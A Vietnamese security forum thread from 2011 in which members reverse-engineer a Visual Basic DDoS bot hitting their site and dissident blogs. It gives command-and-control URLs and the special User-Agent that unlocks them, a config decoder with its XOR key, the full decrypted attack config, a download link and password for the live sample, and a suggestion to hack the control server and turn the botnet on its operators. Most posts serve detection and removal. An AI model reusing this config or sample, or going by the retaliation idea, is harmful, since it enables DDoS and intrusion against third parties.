[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua.

[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Trong tháng 7 năm 2011 này, HVA bị ít nhất là ba trận DDoS khá nặng. Thông qua những thông tin đã thu thập được trong quá trình điều tra và sự hỗ trợ của các bạn bè thành viên, tôi tạm thông báo một số chi tiết quan trọng như sau:

- Có tính chất tương tự như con vecebot mà securedWorks đã công bố hồi cuối tháng 10 năm 2010: http://www.secureworks.com/research/threats/vecebot/?threat=vecebot. Con bot dùng để tấn công HVA cũng nhận chỉ thị từ một file cấu hình xml như con vecebot.

- Con bot dùng để tấn công HVA cũng sử dụng hàng loạt các User-Agent giả mạo để qua mặt hệ thống cản lọc. Những User-Agent được sử dụng y hệt như những User-Agent đã từng tấn công các trang web và các blogs "lề trái". Theo nguồn tin chưa kiểm chứng, vietnamnet cũng đã từng bị DDoS với cùng tính chất như trên.

- Con bot này cũng có thể được khởi động hoặc ngưng lại một cách dễ dàng và nhanh chóng. Điều này biểu hiện qua hiện tượng DDoS đột ngột xảy ra và đột ngột ngưng lại.

Trong khi chờ đợi thu thập thêm thông tin để đối chiếu và kiểm chứng. Tôi tạm công bố một số thông tin như trên. Hãy đón xem các thông tin khác sẽ được cập nhật. Xin cám ơn các anh chị em đã nhanh chóng thu thập và cung cấp những thông tin cực kỳ quý giá.

PS: HVA chắc chắn sẽ tiếp tục bị DDoS nhằm "bịt miệng" những công bố xuyên qua phân tích và RE.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 11:41:56 (+0700) | #2 | 243880
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Thôi thì để em công bố luôn. Các anh STL đọc xong topic này thì close ngay cái host đang ra lệnh DDOS HVA nhé. Coi chừng tụi em chơi trò "Gậy ông đập lưng ông đấy".
Bạn cao thủ trẻ tuổi giấu mặt PM cho em sáng nay:

anh ạ, anh chắc còn nhớ vụ GoogleCrashHandle , cái vụ mà em post bên xxxxxx forum, bạn xxxxx đòi giải thích, em tức nên không post nữa... smilie

Thực ra cái file ấy, nó còn nhiều chỗ hay lắm. Con ấy nó download về một con khác , chính nó là thủ phạm DDoS Vietnamnet. Nhưng vì đang tức nên em chả viết tiếp.

Hồi ấy, cũng rảnh nên em có làm thử 1 cái , mà em bắt chước ở đây
https://zeustracker.abuse.ch/

đại khái là tool để track, để theo dõi các mạng botnet, tuy không được hoành tránh như người ta nhưng em cũng sướng lắm smilie)

Trong con đó có 1 cái link, là http://penop.net/top.jpg, hồi đó không tải được, nhưng mà mấy hôm nay tự nhiên lại thấy báo có mẫu mới, về giải mã ra ( xor 0x19 theo byte ) thì được 1 link khác để tải cái con VB này về http://penop.net/images01.gif

Chính con VB này đang DoS HVA, anh và các anh HVA xem thế nào, dập được server của nó thì tốt quá !

Em gửi anh bộ mẫu, cùng cái file cấu hình, file giải mã cấu hình, anh xem thử xem

UserAgent : An0nym0453

http://direct.aliasx.net/xc.jpg <<< Link tải file cấu hình của nó, là định dạng XML
http://direct.aliasx.net/xv.jpg <<< File này ghi ngày giờ, để làm gì thì em chịu

Link mẫu: http://ifile.it/q13g05h

Pass giải nén là: "5D1DCCDA70433CFC795F6D03459B258D"


[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 11:45:11 (+0700) | #3 | 243881
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tiếp:

Chính là cái file viết bằng VB ấy ạ : AcrobatUpdater.exe. Nó làm nhiệm vụ tân công.

Kịch bản thế này ạ:

Nó vào cái http://direct.aliasx.net/xc.jpg để tải file cấu hình này về. File này được mã hoá, thuật toán XOR thôi nhưng cũng không đơn giản lắm.

Sau đó Bot sử dụng các lớp để parse XML, lấy thông tin, UserAgent, .... rồi tấn công, giống như 1 người dùng bình thường duyệt web và click vào link ấy. Em chỉ hiểu cách nó tấn công là mô phỏng trình duyệt và người dùng lướt web, chứ chống lại thế nào thì em chịu, không có kinh nghiệm.

còn http://direct.aliasx.net/xv.jpg là file chứa ngày giờ, chẳng hiểu để làm gì

2 thằng này anh phải dùng UserAgent là An0nym0453 thì mới lấy được nhé. Dùng cái khác là nó trả về mã 403 ngay smilie

Cái phức tạp của con này là dùng VB để code, đọc thấy oải. Sau 1 tối ngồi không, em cũng RCE xong.

Code giải mã file cấu hình đây, cũng không dài, nhưng chả hiểu hôm qua lơ mơ thế nào em viết thiếu 1 chỗ, nên nếu giải mã vẫn sai đôi chút, giờ thì chắc chắn rồi.

Hệ thống tracker trên máy em vẫn định kì download cái file cấu hình và tìm sự thay đổi, nếu có em lại báo anh biết. Hiện giờ nó vẫn tấn công HVA

Em có ý này, nếu mà các anh có thể xâm nhập được vào cái direct.aliasx.net. hay mình up file cấu hình của mình lên, với target chính là direct.aliasx.net. Cho các bạn ấy biết thế nào là bị DDoS 1 lần. Gậy ông đập lưng ông mà smilie

Code:

#include <Windows.h>
#include <stdio.h>

int main(int argc, char* argv[])
{
FILE *f; int i;
char *pBuffer;
long lSize;
int iKeySize;
char szKey[] = "!asDPSk!@sakkf#!@kskdk12#@!#231saad2asdsD"; //key giai ma
char szOutPut[MAX_PATH] = "";

if ((argc <2) || (argc >3 ))
{
printf("Usage: Decode <Encrypted> <Result>");
exit(1);

}
if (argc == 2)
{
strcpy(szOutPut, "Decoded.txt");
}
else strncpy(szOutPut, argv[2],MAX_PATH);

f = fopen(argv[1], "rb"); //doc file da ma hoa

if (f)
{
fseek(f, 0, SEEK_END);
lSize = ftell(f);
fseek(f, 0, SEEK_SET);

pBuffer = new char[lSize];
if(pBuffer)
{
fread((char*)pBuffer, lSize, 1, f);

iKeySize = lstrlenA(szKey);
for (i = 0; i < lSize; ++i)
{
pBuffer[i] ^= szKey[(i%iKeySize+1)%iKeySize ]; //giai ma file
}
}
fclose(f);


if (pBuffer)
{
f = fopen(szOutPut, "wb");
if (f)
{
fwrite((char*)pBuffer, lSize, 1, f); // ghi lai noi dung da giai ma
fclose(f);
}
else printf("Can not open output file.");
free(pBuffer);
}
}
else printf("Can not open input file.");
return 0;
}

[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 11:52:56 (+0700) | #4 | 243882
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tiếp:
File AcrobatReader.exe có file size = 282624 bytes. Viết = VB 6, nhưng lại build trên máy Win7 64bit. Build date: 16/06/2011, 04:18:01.
Bất cứ bà con nào đang xem topic này, search ngay trên máy mình file trên, cùng các file AdobeUpdater.exe, wcsntfy.* (tức tất cả các file wcsntfy, đuôi là gì không care), kill process và xoá ngay lập tức. Tool xoá: IceSword, GMER, Unlocker, Rootkit Unhooker....
Thà giết lầm còn hơn bỏ sót anh em. Nếu lỡ trùng file tốt, không sao. Dẹp mấy cái auto update Exe đi, autorun chỉ làm chậm máy, chiếm connection.

Và đề nghị anh em post danh sách các file trên lên các blog, forum # để tuyên truyền, khuyên, giúp đỡ mọi người khác, quen hay không quen cũng không sao: Tìm và diệt ngay các file này.


Và đây là nội dung file .xml ra lệnh của tụi STL:
Code:
<?xml version="1.0" encoding="UTF-8"?>
<anonymous maxCrawling="100" resolveTimeout="0" connectionTimeout="10000" sendTimeout="15000" receiveTimeout="90000">
<useragents><![CDATA[Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2. Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2. Gecko/20100722 Firefox/3.6.8
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100723 Fedora/3.6.7-1.fc13 Firefox/3.6.7
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.7) Gecko/20100726 CentOS/3.6-3.el5.centos Firefox/3.6.7
Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.2.7) Gecko/20100713 Firefox/3.6.7 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 GTB7.0
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.6) Gecko/20100628 Ubuntu/10.04 (lucid) Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-PT; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 6.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-CN; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 ( .NET CLR 3.5.30729;
Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))
Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; Media Center PC 6.0; InfoPath.3; MS-RTC LM 8; Zune 4.7)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; InfoPath.3; MS-RTC LM 8; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; Zune 4.0; Tablet PC 2.0; InfoPath.3; .NET4.0C; .NET4.0E)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.2; Trident/4.0; Media Center PC 4.0; SLCC1; .NET CLR 3.0.04320)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; InfoPath.2; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.0; Trident/4.0; InfoPath.1; SV1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 3.0.04506.30)
Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.0; Trident/4.0; FBSMTWB; .NET CLR 2.0.34861; .NET CLR 3.0.3746.3218; .NET CLR 3.5.33652; msn OptimizedIE8;ENUS)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.2; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM
Opera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00
Opera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00
Opera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10]]></useragents>
<headers>
<item id="Firefox" enabled="yes">
<item name="Host" value=""/>
<item name="User-Agent" value=""/>
<item name="Accept" value="text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"/>
<item name="Accept-Language" value="en-us,en;q=0.5"/>
<item name="Accept-Encoding" value=""/>
<item name="Accept-Charset" value="ISO-8859-1,utf-8;q=0.7,*;q=0.7"/>
<item name="Keep-Alive" value="300"/>
<item name="Connection" value="keep-alive"/>
</item>
<item id="MSIE" enabled="yes">
<item name="Accept" value="image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*"/>
<item name="Accept-Language" value=" en-us"/>
<item name="Accept-Encoding" value=""/>
<item name="User-Agent" value=""/>
<item name="Host" value=""/>
<item name="Connection" value="Keep-Alive"/>
</item>
<item id="Opera" enabled="yes">
<item name="User-Agent" value=""/>
<item name="Host" value=""/>
<item name="Accept" value="text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1"/>
<item name="Accept-Language" value="en-US,en;q=0.9"/>
<item name="Accept-Charset" value="iso-8859-1, utf-8, utf-16, *;q=0.1"/>
<item name="Accept-Encoding" value=""/>
<item name="Connection" value="Keep-Alive"/>
</item>
<item id="Chrome" enabled="yes">
<item name="Host" value=""/>
<item name="Connection" value="keep-alive"/>
<item name="Accept" value="application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"/>
<item name="User-Agent" value=""/>
<item name="Accept-Encoding" value=""/>
<item name="Accept-Language" value="en-US,en;q=0.8"/>
<item name="Accept-Charset" value="ISO-8859-1,utf-8;q=0.7,*;q=0.3"/>
</item>
<item id="Safari" enabled="yes">
<item name="Host" value=""/>
<item name="User-Agent" value=""/>
<item name="Accept" value="application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"/>
<item name="Accept-Language" value="en-US"/>
<item name="Accept-Encoding" value=""/>
<item name="Connection" value="keep-alive"/>
</item>
</headers>
<targets>
<item enabled="0" threads="1" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/hvaonline/forums/list.hva" keepCookies="1" crawling="1" referer="http://www.hvaonline.net/"/>
<item enabled="0" threads="3" delay="5" method="GET" protocol="http" host="www.boxitvn.net" port="80" uri="/" keepCookies="1" crawling="1"/>
<item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="danlambaovn.blogspot.com" port="80" uri="/" keepCookies="1" crawling="1"/>
<item enabled="0" threads="3" delay="5" method="GET" protocol="http" host="boxitvn.wordpress.com" port="80" uri="/" keepCookies="1" crawling="1"/>
</targets>
</anonymous>


Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em !
Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận.

useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 12:12:11 (+0700) | #5 | 243884
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
File xv.jpg chỉ vỏn vẹn dòng text này:
Code:
2011-07-20 16:28:52

Ê, đệ tử, xem trong file xv.jpg nè, tao ra lệnh mày đúng hay quá giờ đó là stop tấn công với các chỉ dẩn từ xc.jpg nghe chưa.
Dạ thưa sếp STL, em nghe lệnh. Thằng chủ nhân cái máy này nó không biết đâu, nó là zoombies của "Sống chết theo lệnh" tụi mình mà, he he !!!???

File Exe bot + config của nó em post ở đây: http://www.mediafire.com/?c57bbuc7iwq3ca4
Trong file này còn có file Decode.exe và source Decode.cpp để decode nội dung file xc.jpg ra file .xml để bà con xem. File IDA 61 database chứa thông tin disassembly của con AcrobatUpdater.exe, file images01.gif là chính là file AcrobatUpdater.exe với toàn bộ nội dung đã bị xor với 0x19.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 12:29:37 (+0700) | #6 | 243888
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Hiện giờ botnet này đang tấn công blog danlambaovn ở các URL sau:

http://danlambaovn.blogspot.com/
http://danlambaovn.blogspot.com/2011/07/bat-tay-nhau-thang-7.html
http://danlambaovn.blogspot.com/p/vuot-tuong-lua.html
http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html
http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#more
http://danlambaovn.blogspot.com/2011/07/nguyen-thai-hoc-foundation-chien-dich.html#disqus_thread
http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html
http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#more
http://danlambaovn.blogspot.com/2011/07/tay-chay-san-pham-trung-quoc-mot-chien.html#disqus_thread
http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html
http://danlambaovn.blogspot.com/2011/07/thu-gui-nhung-nguoi-viet-nam-yeu-nuoc.html#more


Zombies connect đến: 174.142.132.185 ở cổng 80 và liên lạc với 2 files: xv.jpg và xc.jpg. Người dùng bình thường không thể truy cập trực tiếp vào 2 files này. Chỉ có zombies với giá trị "User-Agent" đặc biệt mới có thể truy cập và nhận mệnh lệnh.

Khi con malware này được cấy vào máy, có ít nhất là 3 registry keys được điều chỉnh:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Volatile Environment]
CURRENT = "2011-07-20 16:28:52"
DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15.....

nhằm mục đích thực hiện ngay công tác "tàn phá" khi máy được khởi động.

Con malware này còn connect đến 1 địa chỉ của google: 74.125.47.132, không biết để làm gì?

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 12:56:40 (+0700) | #7 | 243890
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Trên danlambao blog đã có bài trả lời về đợt DDOS này của tụi STL: http://danlambaovn.blogspot.com/2011/07/than-gui-cac-bac-cam.html
Bị đánh bắt đầu vào ngày 19 hôm kia. Kinh thật !
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 13:14:57 (+0700) | #8 | 243893
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Thử phân tích ở góc độ khác (network capturing) thì thấy:





(để ý cái "User-Agent" đặc biệt).

Sau đó thì nhận chỉ thị:





Hoá ra 74.125.47.132 là IP của google đang host cái blog của danlambaovn.


Thật ra với lượng traffic ập vào HVA, chỉ cần redirect đến "mother" thì chỉ cần 30 giây là "mother" chết queo nhưng ai lại đi làm như vậy hở? smilie
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 13:43:14 (+0700) | #9 | 243896
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ngoài việc xoá AcrobatUpdater.exe, bà con nên giúp đỡ lẫn nhau để diệt trừ tận gốc cái vấn nạng DDOS này bằng cách up file AcrobatUpdater.exe lên các AV mà các bạn đang dùng.
Càng nhiều AV nhận dạng ra đám bot này thì mấy cái host kia sẽ dần dần vô dụng và tui nó sẽ phải shutdown host thôi.

Tới chiều này, 3:06 PM, máy tui với KIS 2011 vừa manual cập nhật, vẫn không detect được AcrobatUpdater.exe là virus, là bot. Bởi vậy bà con không nên thắc mắc là tại sao AV của mình không phát hiện ra.
Như tui đã nói ở trên, con bot này khá mới, compile và build vào ngày 16/06/2011, tức vào thời gian các topic về RCE "mèo què" của STL trên HVA ta bắt đầu tiến triển và được chú ý.

Lần này tụi STL lại quay sang code = VB, em cũng không hiểu nữa, dùng VC++ với Java chán rồi à. Khi nào dùng Delphi vậy ?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 14:41:36 (+0700) | #10 | 243901
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Dành cho bạn nào thắc mắc về việc làm sao xoá con malware này.

Hãy tìm trong C:\Program Files\Adobe\Updater6\ và nếu có file AcrobatUpdater.exe thì hãy làm những việc sau:

1. Vào trang web này để tải md5sum tool về: http://www.pc-tools.net/win32/md5sums/ rồi xả nén nó ra.

2. Kéo file AcrobatUpdater.exe để chồng lên file md5sums.exe để lấy giá trị hash của file AcrobatUpdater.exe.

3. Nếu giá trị hash là d517e448e15f3ea3b0405b7679eccfd7 thì đích thị nó là thủ phạm.

4. Xoá nó ngay.

5. Vào registry và xoá các key sau:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
Acrobat Reader and Acrobat Manager = "%ProgramFiles%\Adobe\Updater6\AcrobatUpdater.exe"

[HKEY_CURRENT_USER\Volatile Environment]
CURRENT = "2011-07-20 16:28:52"
DATA = 5D 4C 3C 3D 3F 4B 57 25 01 12 02 04 08 1E 03 71 45 43 49 44 0E 5F 51 4C 24 48 4D 55 0E 13 26 35 27 49 0A 43 4C 5A 7E 4E 1D 00 1D 2B 3E 2A 06 4E 35 00 41 06 0A 1E 60 53 21 1C 1F 02 0A 0C 0C 10 12 70 11 01 12 41 54 00 0E 0D 12 57 35 1A 09 16 2B 54 15

What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 21/07/2011 14:46:11 (+0700) | #11 | 243903
phanledaivuong
Member
[Minus] 0 [Plus]
Joined: 23/05/2008 17:34:21
Bài gởi: 315
Đến từ: /dev/null
Offline
[Profile] [PM] [WWW]
TQN wrote:

Các bạn để ý tới 4 dòng cuối cùng, đấy là danh sách các website nạn nhân của tui này, và HVA ta vừa bị tụi nó thêm vào. Muốn DDOS website nào, nó chỉ cần set enabled=1 lên là tiêu em !
Vậy ngoài HVA ta ra, còn boxitvn.net, danlambaovn.blogspot.com và boxitvn.wordpress.com cùng chung số phận.

useragents tag chính là random UserAgent của con bot của tụi "Sống chết theo lệnh" này.


Em cũng là độc giả của bên danlambaovn. bên đó cũng mới thông báo hôm trước là bị DDoS rất nặng, và em cũng đoán là do tụi chó STL làm. ai dè anh em bên HVA RE ra mấy cái liên quan đến DDoS HVA cũng lòi ra thủ phạm DDoS danlambaovn.
danlambaovn có sử dụng blogspot của google. vậy nếu bên STL tiếp tục DDoS với cường độ mạnh thì bên danlambaovn nên thông báo và nhờ google giúp đỡ hay làm như nào để chống? vì đây là sử dụng blog của google nên chắc không được động vào server của google smilie hay là băng thông của google rất lớn nên bọn STL DDoS sẽ không "Xi nhê".
PS: Việc STL DDoS danlambaovn càng chứng tỏ tụi này được Government thuê ... hoặc là được mấy thằng tầu đào tạo để về đánh người nhà?
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 10:55:14 (+0700) | #12 | 243906
TQN
Elite Member
[Minus] 0 [Plus]
Joined: 29/06/2006 22:28:01
Bài gởi: 888
Đến từ: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Chiều qua up mẫu cho Kaspersky Lab, sáng nay thằng KIS nhà em sau khi lệnh nó update, nó đã nhai mất tiêu mẫu AcrobatUpdater.exe rồi. Phải vào năn nỉ nó để nó nhả ra lại smilie

Em cũng mệt mỏi và chán ngán cái đám khùng điên STL này quá rồi. Tui nó như đám chó điên, giờ đang lồng lộn cắn phá lung tung hết smilie

Em chỉ sợ từ chiều qua tới giờ, tụi nó cày như trâu để viết con bot mới, đặt ở host mới, hy sinh 2 cái host kia và thằng Adobe/AcrobatUpdater.exe này, lệnh cho ông nội nằm vùng down bot mới về.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:16:34 (+0700) | #13 | 243907
acoustics89
Member
[Minus] 0 [Plus]
Joined: 08/07/2011 10:17:19
Bài gởi: 50
Offline
[Profile] [PM]
STL sử dụng bot này tấn công theo hành vi duyệt web của người bình thường, thật là không đỡ được.
Kĩ thuật sử dụng trong Bot này khá hay, hiện tại em chưa nghĩ ra cách gì để chống lại. Các bác admin có hướng nào để phòng trống không? Nó giả danh 1 người dùng nhé

p/s: @phanledaivuong : Government nào thì không biết chứ Government của VN chắc chắn chả bao giờ làm thế. Như bản thân mình thì mình cũng không thích trang danlambaovn và chả bao giờ đọc.
[Up] [Print Copy]


[Phân tích] Phân tích tính chất vài trận DDoS HVA vừa qua. 22/07/2011 11:19:05 (+0700) | #14 | 243908
[Avatar]
conmale
Administrator
Joined: 07/05/2004 23:43:15
Bài gởi: 9353
Đến từ: down under
Offline
[Profile] [PM]
Hè hè, từ 5 giờ chiều giờ VN ngày 21/7/2011 đến khoàng trưa nay (khoảng 16 tiếng), HVA bị "ăn đòn khoảng 95 triệu cú đấm.

Chơi kiểu huy động gần hết bandwidth và IP của VN để đấm một cái site như HVA thì đúng là "no fair" smilie.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]


